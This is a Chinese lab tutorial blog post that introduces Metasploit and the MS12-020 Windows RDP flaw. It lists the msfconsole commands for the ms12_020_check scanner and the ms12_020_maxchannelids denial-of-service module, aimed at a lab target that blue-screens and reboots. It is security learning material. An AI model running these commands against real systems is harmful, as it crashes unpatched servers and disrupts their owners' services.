发布时间:2023-10-11 08:30
博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
本文仅限于网络安全工作者学习使用,此系列仅用于工作和学习,禁止用于非法攻击。一切遵守《网络安全法》
Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
后续会有专门的文章介绍MSF,这里只是一个实例,就不多讲了。
MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)
RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
靶机win-2008-r2-server 192.168.1.211
攻击机kali 192.168.13.131
靶机开启3389端口,并且攻击机与靶机互通
不会开放端口的可以去看我之前关于远程连接的文章,这里不赘述:
[ 网络基础篇 ] Windows 远程连接 linux 机器 && Windows 远程连接 windows 机器(详解)
https://blog.csdn.net/qq_51577576/article/details/125873655
search ms12-020
使用ms12-020检测模块
use auxiliary/scanner/rdp/ms12_020_check
填写靶机ip
set rhosts 192.168.1.211
运行检测模块
run
使用ms12-020攻击模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
填写靶机ip
set rhosts 192.168.1.211
运行
run
查看靶机,发现蓝屏,并在一定时间后自动重启
这个漏洞能稳定蓝屏,在一些演示场景中经常用到